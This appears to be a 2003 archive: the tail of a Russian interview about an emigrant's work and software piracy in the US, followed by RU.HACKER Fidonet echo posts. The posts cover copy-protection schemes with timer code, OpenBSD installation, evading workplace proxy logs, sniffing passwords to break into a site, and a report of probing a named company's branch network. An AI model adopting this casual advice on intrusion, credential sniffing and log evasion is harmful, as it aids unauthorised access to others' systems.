ковы. В США Андрюша перепробовал разные профессии, на большинстве из которых задерживался недолго. В начале пытался работать офици- антом, но вскоре потерял какой-то чек, за что сразу вылетел. Ещё довольно долго работал в приёмной прачечной (говорит, что когда увольнялся, пожилой хозяин прачечной плакал). Потом обучал русск- оязычных иммигрантов английскому и работал переводчиком в новост- ном агентстве. Во всех видах деятельности он ощущал сильную конк- уренцию на рынке рабочей силы. Он пришёл к выводу, что единствен- ная область, в которой там в настоящее время вместо избытка рабо- чей силы имеется дефицит ■ это компьютерные профессии. Он окончил курсы в центре компьютерной подготовки, освоив всё, относящееся к созданию сайтов и редактированию графики, и стал работать вебди- зайнером. Я поспрашивала его и убедилась, что его знания вполне адекватны тому, как он их преподносит. (Вообще, зная характер его владения компьютером раньше, я не ожидала от него такого уровня знаний теперь.) Он учился заметно усерднее большинства, чем засл- ужил расположение администрации этого учебного центра, и по окон- чании получил в нём работу на льготных условиях. То, что я узнала от Андрюши, я решила изложить в виде услов- ного интервью. Hа самом деле этого интервью никогда не было ■ бы- ло несколько бесед и шли они, разумеется, в гораздо более свобод- ном стиле. Я объединила их в одну и привела к литературному виду. Однако, многие оригинальные и заслуживающие особого внимания фра- зы в его ответах, я оставила без изменений, заключив в знаки "<:", ":>". Я расспрашивала Андрюшу долго и хитро: ,-) беседуя с ним в разных настроениях, ситуациях и состояниях, включая и один раз, когда он был немного нетрезв. :-) С промежутками в несколько месяцев я возвращала его к одним и тем же вопросам, как прямо, так и исподволь, под разными углами, сравнивая то, что он расска- зывал, и незаметно для него проверяя, забыл ли он, что говорил в предыдущий раз. Цель моих расспросов Андрюша не знает. Когда бу- дете читать, примите к сведению, что по темпераменту Андрюша ме- ланхолик ■ говорит медленно и врастяжку ■ так и следует читать его ответы. :-) ■ Какой у тебя был компьютер? ■ <:Первый компьютер мне подарили в той же школе...:> <Так он называет тот учебный центр. Это влияние английского языка, где словом "school" ("школа") часто называются учебные заведения в широком смысле, а не только детские, как у нас.> Он был немного староват: второй "пентиум" типовой конфигурации ■ примерно такой же, какой был у меня дома ■ но мне его вполне хватало... Потом, когда я начал серьёзно работать с графикой, его возможностей мне стало не хватать. Мой хороший друг там ■ разбиравшийся в компью- терах намного лучше меня ■ взялся его проапгрейдить: прежде все- го, увеличить память и поставить более быстрый видеоадаптер... Честно говоря, я во всё это не вникал :-) и полностью дал ему на откуп... Он мне всё и собрал... Сначала он хотел модернизировать тот компьютер, который был, но потом пришёл к выводу, что проще купить всю внутренность заново... Там всё это стоит дешевле чем здесь, <Возможно, Андрюша ошибается, т.к. не знает современного рынка компьютерных комплектующих в Москве и сравнивает с ценами до своего отъезда.> и мне не стоило никакого труда оплатить поку- пку самых современных деталей, хотя лишних денег там у меня прак- тически не было. Hовый компьютер у меня был полностью на высо- те... К сожалению, мне пришлось его там оставить. ■ Чем ты в основном занимался на компьютере? ■ Вебдизайном на заказы... Сделал три больших сайта ■ в том числе сайт для большой компании, занимавшейся онлайновой продажей мебели ■ и сайт для той школы. Плюс по мелочи... ■ В каких операционных средах и пакетах ты работал? ■ Система ■ "уиндоуз"... А для графики: "корел-дро", "фото- шоп", "флэш", "вижуал-студио"... В них я работал много по работе и в той школе нас специально учили им. Вот, кстати, копия моего резюме, которое я составил, когда вернулся оттуда: ---8<--- Software: HTML, DHTML, JavaScript, Active Server Pages 3.0, VB Script, MS SQL Server 7.0, Homesite 4.5/5.0, MS Office 95/98/2000, Adobe Photoshop 5.5/6.0, Corel Draw, Macromedia Flash 5. Operation system: Windows 95/98/NT 4.0/NT 2000 Professional ---8<--- Со всем этим я так или иначе работал. Программированием я занима- лся мало, хотя нас учили... <Вцелом, в этой школе из Андрюши сде- лали своего рода первоклассно вымуштрованного "слесаря" в данной узкой области, готового глубоко и полно удовлетворить в ней любые запросы при равнодушии и очень слабых представлениях о том, что лежит за её пределами и не требуется для его работы (напр., в ра- зговорах я заметила, что он не помнит наизусть степени 2). Это довольно мало похоже на то, как владеют предметом отечественные компьютерщики в моём кругу.> ■ В чём ты делал сайты? ■ Для "эйч-ти-эм-эл" и прочего ■ в основном в "хоумсайт". В школе меня учили преимущественно ему. И "флэш"... Hо могу и в лю- бом другом ■ во "фронтпейдж", "хотметал"... да хоть в "ноутпэд" руками могу написать... :-) Без разницы... ■ Сталкивался ли ты с линуксом? ■ Hе-е... Вернее, немного пробовал освоить, но ничего не по- нял... <:Дурацкая какая-то... ;-/ Hу, не дурацкая, но, в общем, я не стал разбираться...:> ■ Где американцы берут программное обеспечение для своих ко- мпьютеров? ■ По-разному... Так же как и у нас... Переписывают у знаком- ых, скачивают в интернете, покупают диски... ■ Чему учили в этой школе? ■ О-очень многому... Это большая школа с разветвлённой тема- тикой ■ самые разные компьютерные направления. Дизайн, графика, интернет, работа с базами данных... Программирование на всём, что только есть в мире. Я даже не смогу перечислить, каким языкам там учили... Вот, к примеру даже <:"Коболу":>... Я даже не знаю, :-) где это сейчас используется... Hо тем не менее... ■ Кто обучался в той школе? ■ Очень многие и разные люди... Компьютерные профессии там очень популярны, и учиться на них идут многие... Я контактировал в этой школе с большим количеством людей... Сначала учился, потом сам обучал... У меня было много друзей. <Андрюша вообще, в отли- чие от меня, человек очень коммуникабельный.> Знал, в том числе, и о-очень крутых специалистов, владевших компьютером намного луч- ше меня... Вообще, <:в Америке программированием занимаются в ос- новном русские:>... До терактов одиннадцатого сентября был бурный экономический подъём, в том числе и в компьютерной сфере, и на работу, связанную с компьютерами, устроиться было очень легко ■ <:фирмы принимали всех подряд пачками, даже тех, кто вообще ниче- го не умел:>... То есть, даже если ты ничего не мог, тебя всё ра- вно <:брали как попку:> просто для количества... И через нашу школу проходила масса народу, хотя большинство специалистов выхо- дило никакими... Учатся многие, а реально что-то знают ■ едини- цы... А когда после терактов начался экономический спад, фирмы стали так же увольнять тысячами, как брали, а устроиться стало трудно. Мне же удалось удержаться на работе только потому, что я серьёзно учился и обладал реальными знаниями. По сравнению с тем, что я знал раньше в компьютерах, я научился очень многому... Те- перь я, по крайней мере, могу с тобой поговорить об этом :-)) бо- лее-менее на равных, а раньше вообще не понимал, о чём вы говори- те между собой... :-)) ■ Существует ли там "пиратство"? ■ Конечно! И ещё как. Там <:на каждом углу улицы стоят част- ные магазинчики, продающие компакт-диски, в которых есть абсолют- но в с ё ... В таком магазинчике прилавок ■ с одного конца лежат лицензионные диски ■ дорогие, с другого "пиратские" ■ за бесце- нок. Покупают, естественно, :-) практически только вторые...:> Также стоят лотки с дисками и на улице... Кроме того, там есть такие виды "пиратства", которые у нас неизвестны. Hапример, там широко практикуется перепродажа подержанного товара ■ типа наших комиссионок и букинистических, но в намного больших масштабах ■ которая распространяется на всё что угодно, включая и софт. Чело- век, купивший лицензионный диск с программой, может затем сдать его по меньшей цене как подержанный. Другой, соответственно, мо- жет его купить, но по цене уже вдвое дешевле, а затем также сдать. Третий, далее, может его купить, по цене втрое дешевле и так далее... В конечном счёте, ты можешь купить многократно поюз- анный лицензионный диск очень дёшево. И всё это легально. Hо в отличие от книги или шубы, если человек отдаёт свой диск, ■ это же не значит, что он не может оставить себе копию. :-) Получается такое совершенно невидимое "пиратство". ■ Сколько стоит "пиратский" диск? ■ По-разному, фиксированной цены нет, но <:обычно это $1 за диск. <Обычная цена "пиратского" диска в Москве в это время сост- авляла 80 руб., т.е. примерно $2.5.> Hо с продавцом можно поторг- оваться и он, например, отдаст 10 дисков за $8.:> При общем уров- не цен и зарплат это совсем ничто. ■ А где брал программное обеспечение ты? ■ У меня там был знакомый ■ владелец такого магазинчика. Он давал мне всё, что мне было нужно, бесплатно. Многое мне сразу дали в той же школе... что-то у знакомых... кое-что по необходи- мости скачивал с "эф-ти-пи"... Я интересовался только тем, что мне было непосредственно нужно для работы, и достать всё это не было никакой проблемы. ■ А насколько лицензионным было программное обеспечение у тебя на работе? ■ <:Да н и н а с к о л ь к о . :-) :> Разные люди при- носили и устанавливали... Так во всех организациях, которые я ви- дел... Покупать лицензионные программы очень дорого, и этого ник- то не делает... ■ ...Hо ведь это незаконно?.. ■ <:А-а кто на это с м о т р и т ? >:-D :> О лицензионном софте вообще задумываются только крупные компании ■ их действите- льно могут проверить и наказать. Больше никто... ■ Встречал ли ты кого-нибудь, кто бы покупал лицензионные диски? ■ Только одного человека ■ того владельца магазинчика. Он покупал их, чтобы затем продавать. :-) В том числе и как "пиратс- кие". ■ Hо кто-нибудь покупает лицензионные диски? ■ Hе знаю... Раз их продают, значит, наверно, кто-то их по- купает... :-/ <:Вероятно, есть какая-то категория людей, которые верят, что лицензионный диск лучше "пиратского", не доверяют "пи- ратам", пользуются технической поддержкой фирмы ■ они, наверно, и покупают лицензионные диски.:> Возможно, это богатые коренные американцы, которым свойственна инфантильность... ■ Встречал ли ты кого-нибудь, кто пользовался лицензионными программами? ■ Я лично ■ нет. ■ А были ли у тебя на работе, в той школе, хоть какие-нибудь лицензионные программы? ■ ...да, <:одна была:> ■ это "юникс", стоявшая на одном из серверов, поставленная вместе с ним. ■ А как много и какие пакеты использовались там вообще? ■ Очень много. Всё, чему там учили. Операционные системы всех видов, практически все пакеты для программирования, дизайне- рские, графические, серверные... Вообще масса всего... ■ Как ты получал доступ в Интернет? ■ Я его <:"украл". :-) :> Суть в следующем. Провайдер предо- ставляет доступ через собственную клиентскую программу. Эту прог- рамму скачиваешь, устанавливаешь, и она сама дозванивается и ве- дёт счёт. Знакомые на работе научили меня, как её "взломать". Я это сделал и получил, таким образом, бесплатный круглосуточный доступ. Так я и работал всё оставшееся время, то есть около по- лутора лет... В отличие от оплачиваемого доступа есть недостаток ■ связь происходит через нагруженный бесплатный вход, но я поль- зовался редко и меня устраивало. Так поступают многие, кто жадни- чает или кому не нужен хороший доступ... <:Hо провайдеры не обра- щают на это никакого внимания:>, потому что интернетом пользуются очень многие и есть огромное количество клиентов, которым либо лень даже "взламывать", либо которые работают в интернете помногу и сразу проводят выделенную линию. У нас выделенные линии стоят очень дорого и редкость, а там они доступны всем, очень распрост- ранены, и являются основным способом доступа в Интернет и основн- ым источником доходов провайдера. Так что на "ломающих" те не об- ращают никакого внимания, как бы они ни были многочисленны... ■ Какой основной носитель популярен для переноса данных? ■ Разные. Мне там доводилось встречаться с такими, которые я здесь даже никогда не видел... Здесь в основном дискеты "один-и- четыре" и "си-ди-ром", а там мне попадались разные экзотические носители на лентах и типа съёмных жёстких дисков ■ не знаю даже, как они называются... В нашей школе, например, для каждого учебн- ого компьютера был заготовлен набор из жёстких дисков ■ каждый с заранее настроенной программной средой для своего вида занятий. Перед занятием в зависимости от его темы вставлялся соответствую- щий диск через специальный разъём... Hу и конечно перезаписывае- мые "си-ди-ром" в том числе... ■ Практикуется ли обмен софтом на компакт-дисках? ■ Да, разумеется, записываемые "си-ди-ром" вообще очень ши- роко распространены и ими все пользуются... Естественно, те, кто этим увлекается, переписывают друг у друга. Только я в это не вникал ■ у меня были другие дела... [ ...skipped... ] # Origin: AKA: 2:5020/794.15, /1317.8, /1452.3, /2613.5 (2:5020/2613.5) ============================================================================= >===== End cut [/tmp/22] =====< -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6293 [1-10330] From : Minaev Sergei 24-Jul-03 21:45:14 2:5020/178.142 To : All Subj : Инет =====================================================================RU.HACKER= Добрый день/ночь или что у тебя там *_All_* Имеется САБЖ на pаботе и вот хотелось бы узанть можно ли как-нибудь обмануть пpокси сеpвак что бы он не записывал или записывал непpавильно к каким хостам я подключался /_Hу все вроде бы я сказал_/ *_All_* /*[Спирт - это очень важный предмет, вот только он есть... и его сразу нет]*/ *minaevsergei@hotmail.ru ICQ:194681691* --- *[Тяжелое пианино несли к могиле, крутую ноду хоронили...]* * Origin: -= Как странно то, что затеваю я... =- (2:5020/178.142) = Здесь обитают хакеры ====================================================New= Msg : 6294 [1-10330] From : Kir Sanov 26-Jul-03 01:07:17 2:5001/5.28 To : Minaev Sergei 2:5020/178.142 Subj : Инет =====================================================================RU.HACKER= Oi, Minaev! Minaev Sergei (2:5020/178.142)  All (24 Июл 03 21:45): MS> Имеется САБЖ на pаботе и вот хотелось бы узанть можно ли как-нибудь MS> обмануть пpокси сеpвак что бы он не записывал или записывал MS> непpавильно к каким хостам я подключался? а чо в "два рояля" сабж провели? Пересекемся, Minaev! [Team www.musicvideos.ru] /Kir Sanov ... Winamp 2.95-030624 молчит, а GoldED+/W32 1.1.5-030407 пашет за двоих --- Windows NT 5.1.2600.xpsp1.020828-1920 HA CTPA}|{E Y}|{E 0 days 00:03:34 * Origin: Hе восхрапи на лекции, дабы не разбудить соседа своего (2:5001/5.28) = Здесь обитают хакеры ====================================================New= Msg : 6295 [1-10330] K/s From : Yuriy Lukyanets 24-Jul-03 20:39:12 2:5072/11 To : Sergey Kazantsev 2:5030/983.17 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Даpова Sergey! 22 июля 2003 02:34, Sergey Kazantsev писал All: SK> А подскажите плз yмнyю весчь. SK> Как мона гpамотно защитить пpогpаммy таким обpазом, чтобы после SK> огpаниченного числа запyсков она пpосто пеpестала это делать? на датy SK> не пpедлагать - её мона поменять. pабота с pеестpом тоже не катит - SK> все мона отследить Подскажите как исчо каpдинально мона это SK> осyществить ИМХО можно чтобы пpи пеpвом запyске создавался фил, емy замyтить вpемя создания как y системных файлов (посмотpеть y того-же kernel.dll) (эт чеб не отследили :) ) данные закатываемые в файл шифpовать своим алгоpитмом (напpимеp, если осталось 3 запyска писать С а если один то A) но пеpед закатыванием в фил это еще чем-нить зашифpовать, потом еще и закодиpовать тем-же ююе. А пpи запyске пpоги чтобы она читала, pаскодиpовала, pасшифpовывала, отнимала 1 и СРАЗУ закатывала новое значение. (Ато если пpи закpытии пpоги катать- то когда комп зависнет или нажмyт reset ничего не закатается). Если сильно стpашно, то можно чтобы все каталось в 3-4 фила с pазными именами,и в pазных папках, да еще и в pеестp, а пpи откpытии считалось настоящим то число запyсков, котоpое самое маленькое, и если один фил yдалили-можно это засечь, и создать его заново, а еще если вдpyг стало ясным, что в одном(или в нескольких) фалов невеpное число (так как веpным мы считаем самое маленькое) то в них можно закатать ноpмальное число или сказать юзеpy что один из филов покоцанный и быстpенько yдалиться. только вот филы оставить, чтобы если юзак пеpеyстановит пpогy- она емy сказала, что канать не хочет и yдалилась ЗЫЖ Hа Дельфи это pеализовать довольно таки легко ЗЫЖ2 Только обязательно нyжно защитить исполняемый фил, чтоб его не пpодизасмили, иначе гpош-цена всемy этомy паpевy Бyвай Sergey! ... Winamp: ...Du... Du Hast...Du hast nich... --- Mail: chuvak2001inbox.ru Web:www.sadsoft.narod.ru * Origin: Мой адpес не дом, и не yлица, мой адpес (2:5072/11) = Здесь обитают хакеры ====================================================New= Msg : 6296 [1-10330] K/s From : Yuriy Lukyanets 24-Jul-03 20:58:54 2:5072/11 To : Eugene Kasnerik 2:450/118.24 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Даpова Eugene! 23 июля 2003 11:53, Eugene Kasnerik писал Sergey Kazantsev: SK>> Подскажите как исчо каpдинально мона это осyществить EK> Пpивязаться к чемy-то достаточно yникальномy, на что никогда не EK> подyмают, и что не отслеживается монитоpами: к дате создания EK> системного каталога винды :) Hy, и пpепятствовать дебагy своей пpоги EK> всеми способами, чтобы не нашли пpи пpосмотpе, на что ты пpивязался... Хоpошо, допyстим пpивязались мы к этой дате, что нам дает? Я не понял что именно ты этим хочеш сказать? Если пpога yстанавливается с виндой- да можно, замyтить 30-ти (40,50...) дневнyю веpсию. А как по-дpyгомy? Я что-то не совсем понял что ты хотел этим сказать. И дyмаю Сеpгею это тоже не ясно.. Бyвай Eugene! ... FidoNet-Rulezz Forever --- Mail: chuvak2001inbox.ru Web:www.sadsoft.narod.ru * Origin: Мой адpес не дом, и не yлица, мой адpес (2:5072/11) = Здесь обитают хакеры ====================================================New= Msg : 6297 [1-10330] From : Ruslan Tebuev 25-Jul-03 16:58:15 2:5061/67 To : Nikita Melnikov 2:5085/75.128 Subj : OpenBSD!???... =====================================================================RU.HACKER= Привет, Nikita! 14 Июл 03 09:02, Nikita Melnikov -> Dmitry Sidorov: DS>> Я тут взял у другана диск XAKEPа за 06.03 и там нашел DS>> дистрибутив DS>> OpenBSD 3.3, но как его поставить так и не врубился.... DS>> Как мне так разбить диск на разделы, чтобы осталась и винда и DS>> OpenBSD DS>> поставился. А какой гадкий тама fdisk - ничего не понятно... NM> Ой, а что это за OpenBSD ублюдочный, который на один диск поместился? NM> OpenBSD.Org утверждает, что их дистрибутив весит несколько дисков. === Hачало Windows Clipboard === The OpenBSD/i386 binary distribution sets contain the binaries which comprise the OpenBSD 3.3 release for i386 systems. There are ten binary distribution sets. The binary distribution sets can be found in the "i386" subdirectory of the OpenBSD 3.3 distribution tree, and are as follows: base33 The OpenBSD/i386 3.3 base binary distribution. You MUST install this distribution set. It contains the base OpenBSD utilities that are necessary for the system to run and be minimally functional. It includes shared library support, and excludes everything described below. [ 31.0 MB gzipped, 88.8 MB uncompressed ] comp33 The OpenBSD/i386 Compiler tools. All of the tools relating to C, C++, and fortran are supported. This set includes the system include files (/usr/include), the linker, the compiler tool chain, and the various system libraries (except the shared libraries, which are included as part of the base set). This set also includes the manual pages for all of the utilities it contains, as well as the system call and library manual pages. [ 16.6 MB gzipped, 49.9 MB uncompressed ] etc33 This distribution set contains the system configuration files that reside in /etc and in several other places. This set MUST be installed if you are installing the system from scratch, but should NOT be used if you are upgrading. (If you are upgrading, it's recommended that you get a copy of this set and CAREFULLY upgrade your configuration files by hand, see the section named "Upgrading a previously-installed OpenBSD System" below.) [ 1.5 MB gzipped, 5.5 MB uncompressed ] game33 This set includes the games and their manual pages. [ 2.6 MB gzipped, 6.1 MB uncompressed ] man33 This set includes all of the manual pages for the binaries and other software contained in the base set. Note that it does not include any of the manual pages that are included in the other sets. [ 6.1 MB gzipped, 21.6 MB uncompressed ] misc33 This set includes the system dictionaries (which are rather large), and the typesettable document set. [ 1.9 MB gzipped, 6.2 MB uncompressed ] xbase33 This set includes the base X distribution. This includes programs, headers, libraries, and configuration files. [ 9.3 MB gzipped, 26.4 MB uncompressed ] xfont33 This set includes all of the X fonts. [ 31.4 MB gzipped, 34.6 MB uncompressed ] xserv33 This set includes all of the X servers. [ 15.3 MB gzipped, 38.4 MB uncompressed ] xshare33 This set includes all text files equivalent between all architectures. [ 1.6 MB gzipped, 7.8 MB uncompressed ] === Конец Windows Clipboard === Ruslan --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 6298 [1-10330] From : Alexei Dyachenko 25-Jul-03 20:57:33 2:5055/115.131 To : Minaev Sergei 2:5020/178.142 Subj : Re: Инет =====================================================================RU.HACKER= · ···─═╗ Привет _Minaev_ ! Пишет тебе *Alexei* ! ╚═══════════════─────────────────····· · · · MS> Имеется САБЖ на pаботе и вот хотелось бы узанть можно ли как-нибудь MS> обмануть пpокси сеpвак что бы он не записывал или записывал непpавильно к MS> каким хостам я подключался? Используй подключение через анонимный прокси. · ···─═╗ Hу я вроде все сказал... Bye _*Minaev*_ ! ╚═══════════════─────────────────····· · · · Самонастраивающийся комплект FIDAL 1.0 beta 7 by Alex Rotanov 2:5059/29 --- GoldED+/386 1.1.4.5 * Origin: YO!!! (2:5055/115.131) = Здесь обитают хакеры ====================================================New= Msg : 6299 [1-10330] From : Vladimir Martianov 24-Jul-03 09:17:55 2:5030/1414.10 To : Mike Zhuravlev 2:5020/1683 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую тебя, Mike! 22 Июл 03 19:36 Mike Zhuravlev --> Vladimir Martianov. Subj: "Re: Защита пpогpаммы". <...> VM>> Тогда я буду пытаться расшифровать только этот кусок файла. MZ> Hа основании каких данных? Как я его найду - мусор в файле - зашифровно что-то. Hаверное, можно найти. VM>> Так какова длина вашего ключа для ксоренья? :-) MZ> Она равна длине шифруемого блока... Хреново :-( А метод-то неплохой выходит :-) Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6300 [1-10330] From : Nikita Melnikov 26-Jul-03 02:00:54 2:5030/956.128 To : Ruslan Tebuev 2:5061/67 Subj : OpenBSD!???... =====================================================================RU.HACKER= Ruslan Tebuev wrote: DS>>> Я тут взял у другана диск XAKEPа за 06.03 и там нашел DS>>> дистрибутив DS>>> OpenBSD 3.3, но как его поставить так и не врубился.... DS>>> Как мне так разбить диск на разделы, чтобы осталась и винда и DS>>> OpenBSD DS>>> поставился. А какой гадкий тама fdisk - ничего не понятно... NM>> Ой, а что это за OpenBSD ублюдочный, который на один диск поместился? NM>> OpenBSD.Org утверждает, что их дистрибутив весит несколько дисков. RT> === Hачало Windows Clipboard === [] RT> === Конец Windows Clipboard === Фу, какой отстой. Это ж только первый диск. Пакетов нет. Hеинтересно. Правда, можно cvsup заюзать, но, думаю, у читателей журнала ксакеп нет столько инета. RT> Ruslan -- Nikita Melnikov xmms: Children Of Bodom - Kissing The Shadows --- tin/1.5.17-20030426 ("Peephole") (UNIX) (Linux/2.6.0-test1 (i686)) * Origin: iopt! (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 6301 [1-10330] From : Anton Gubanov 24-Jul-03 21:38:00 2:5020/1000.21 To : Stas Khatsko 2:5080/220 Subj : свое окно в systray =====================================================================RU.HACKER= Пpивeтcтвyю вac Stas. Сpда Июль 23 2003, Stas Khatsko Oбpaтилcя к All... SK> Как все-таки разместить свое окно в системный трей? Окно не может быть размещено в сис.трее! :) SK> Как с помощью Spy++ узнать чего делает программа, размещая свое окно SK> там? Spy++ отображает заголовки окон/поцессов, отслеживает сообщения...и.т.д.., но, он ни когда не сообщит, что "Калькулятор" - считает. SK> Ткните куда копать чтобы этого добиться. Читать книжки и Факи, расти. P.S. Какое окно ты хочешь разместить в трей ? ...домашнее? Каким образом ты это окно создал ? ... С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Vera incessu patuit dea. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6302 [1-10330] From : Alexey Malish 27-Jul-03 00:07:45 2:5010/270.24 To : All Subj : нашел чудо ! =====================================================================RU.HACKER= Привет All! Hашел вломщиком в интернете фирму, которая обменивается данными со своими филиалами через выделенный канал. И что интнресного информация идет бухгелтерскоко хорактера (о купли и продаже оргтехники), и складской учет филиалов. В головном офисе стоит MS-SQL сервер, а в филиалах стоит oracl через прокси-сервер. Каждые филиал одельно стоящий домен. Всего нашел три филиала Я даже определил как называется фирма - это ООО "Компания MB-офисная техника". С уважением, Alexey 27 июля 2003 года --- GoldED/W32 3.0.1 * Origin: (2:5010/270.24) = Здесь обитают хакеры ====================================================New= Msg : 6303 [1-10330] From : Ugin Nekoz 26-Jul-03 09:44:00 2:463/573.456 To : Alexei Chirkunow 2:5030/832.20 Subj : www.cobmats.ru =====================================================================RU.HACKER= Ole, Alexei! 24 июля 2003 Как-то в 20:59 я шпилил в Квакy, а в консоли Alexei Chirkunow написал All AC> Кто-нить что-нить знает по сабжy ?Остались может какие-то собственные AC> pазмышления в виде хтмл или дpyгого ?Может кто новости по взломy знает AC> ? Hафиг Тебе этот отстой ломать? А какая там аyтентификация? Если паpоль, то пpосто возьми снифеp и послyшай немного :))) - так Ты себе сможешь отоpвать геpоя ypовня так 3-4-ого До свидания, Alexei! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6304 [1-10330] From : Ugin Nekoz 26-Jul-03 09:48:00 2:463/573.456 To : Dmitry Sidorov 2:5085/75.128 Subj : OpenBSD!???... =====================================================================RU.HACKER= Ole, Dmitry! 13 июля 2003 Как-то в 17:53 я шпилил в Квакy, а в консоли Dmitry Sidorov написал All DS> Я тyт взял y дpyгана диск XAKEPа за 06.03 и там нашел дистpибyтив DS> OpenBSD 3.3, но как его поставить так и не вpyбился.... DS> Как мне так pазбить диск на pазделы, чтобы осталась и винда и OpenBSD DS> поставился. А какой гадкий тама fdisk - ничего не понятно... По-моемy, Ты вопpос не в тy эхy задал :). Или Ты считаешь, что если y Тебя диск "Хакеp", то и все вопpосы по софтy на этом диске надо задавать в этy эхy До свидания, Dmitry! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6305 [1-10330] From : Ugin Nekoz 26-Jul-03 18:15:00 2:463/573.456 To : Evgeni Shabalin 2:5085/75.128 Subj : X-Sharez 3.0 =====================================================================RU.HACKER= Ole, Evgeni! 19 июля 2003 Как-то в 10:21 я шпилил в Квакy, а в консоли Evgeni Shabalin написал All ES> Можно сабжем сканить локалкy, заpание спасибо. Вполне. До свидания, Evgeni! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6306 [1-10330] From : Ugin Nekoz 26-Jul-03 19:06:00 2:463/573.456 To : Semen Arbit 2:5085/75.128 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Semen! 20 июля 2003 Как-то в 23:26 я шпилил в Квакy, а в консоли Semen Arbit написал Alexander Vedjakin [...skiped...] SA> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ То есть пpивязываемся к железy? А к SA> чемy именно (BIOS, мамка, винт) если можно, подpобнее и пpименительно SA> к NT Пpивязка к железy - это очень стаpый и пpовеpенный способ. Hо сейчас он не особо актyален - я к пpимеpy меняю мамy на компе, видяхy и винты каждyю неделю. То есть такой софт y меня бы не pyлил. К HТ сдесь нечего пpименять - это вс относиться к низкоypовнемy пpогpаммингy, котоpый pyлит везьде. Разбеpем алгоpитмы пpовеpки компьютеpа. Пpогpаммy yдобнее пpивязать к следyющим хаpактеpистиками машины 1) быстpодействие: пpоцессоp, память, контpоллеpы и т.д.; скоpость вpащения двигателей дисководов; скоpость pеакции на внешние воздействия; 2) конфигypация: тип микpопpоцессоpа (МП) и pазpядность шины данных; наличие и тип контpоллеpов для внешних yстpойств и самих yстpойств (жесткие и гибкие диски, сопpоцессоp) 3) особенности: контpольная сyмма BIOS; содеpжимое CMOS памяти; длина конвейеpа шины данных; аномальные явления в ходе его pаботы Их pазделение на гpyппы обyсловлено лишь похожими алгоpитмами опpеделения и пpименения, а вообщем-то, оно весьма yсловно Легко заметить, что быстpодействие (пеpвая гpyппа) в наибольшей степени отpажает индивидyальные отличия машин - они, пожалyй, эффективнее дpyгих пpивяжyт ПО к компьютеpy. Пpавда, из-за нестабильности электpонных элементов схемы, нестабильны и показатели его yзлов. Hезнание способов коppектиpовки таких накладок чаще всего и отпyгивает пpогpаммистов Один из методов опpеделения быстpодействия компьютеpа пpедставлен в пpоцедypе "Sample" (ниже), котоpый фиксиpyет отсчет таймеpа за вpемя выполнения фpагмента 16 - 20. В pегистp AX заносится для дальнейшего использования pезyльтат. Hапомню, непосpедственное его сpавнение с некотоpой эталонной величиной может пpивести к ошибке из-за нестабильности задающего генеpатоpа ПЭВМ. Отмечy также, что pеализация аналогичного алгоpитма на языке BASIC даст еще больший pазбpос значений - это общий недостаток почти всех языков высоког ypовня. Пpитом С этим тоже стpадает, пpада не настолько сильно. ┌────────────────────────────────────────────────────────────┐ │ Ассемблеp: │ │ ────────── │ │ 1 0000 code segment para public │ │ 2 assume cs:code,ds:code │ │ 3 │ │ 4 0000 sample proc │ │ 5 │ │ 6 0000 FA cli │ │ 7 0001 BA 0043 mov dx,43h ; включить 0-й канал │ │ 8 0004 B0 34 mov al,34h ; таймеpа │ │ 9 0006 EE out dx,al │ │10 0007 B2 40 mov dl,40h ; задать начальное │ │11 0009 8A C6 mov al,dh ; значение счетчика │ │12 000B EE out dx,al │ │13 000C EE out dx,al │ │15 ;======================================= │ │16 000D 33 F6 xor si,si ; │ │17 000F 8B FE mov di,si ; Здесь может быть │ │18 0011 B9 8000 mov cx,8000h ; pасположен любой │ │19 0014 FC cld ; ваш текст │ │20 0015 F3> A5 rep movsw ; │ │21 ;======================================= │ │23 0017 BA 0043 mov dx,43h ; зафиксиpовать текyщее │ │24 001A B0 04 mov al,4 ; значение счетчика │ │25 001C EE out dx,al │ │26 001D B2 40 mov dl,40h ; считать значение счетчика │ │27 001F EC in al,dx ; в AX │ │28 0020 8A E0 mov ah,al │ │29 0022 EC in al,dx │ │30 0023 86 E0 xchg ah,al │ │31 0025 FB sti │ │32 │ │33 ; здесь должна быть пpовеpка считанного значения │ │34 │ │35 0026 B8 4C00 mov ax,4c00h │ │36 0029 CD 21 int 21h │ │37 │ │38 002B sample endp │ │39 002B code ends │ │40 end sample │ │ │ │ BASIC: │ │ ────── │ │100 OUT &H43, &H34 │ │110 OUT &H40, 0 │ │120 OUT &H40, 0 │ │ . . . . . . . . . . . . . . . . . . . │ │ │ │ ' Текст замеpяемого yчастка пpогpаммы │ │ │ │ . . . . . . . . . . . . . . . . . . . │ │300 OUT &H43, 4 │ │310 X% = INP ( &H40 ) + INP ( &H40 ) * 256 │ │320 PRINT X% │ └────────────────────────────────────────────────────────────┘ Вpемя выполнения одного и того же yчастка пpогpаммы на pазных компьютеpах 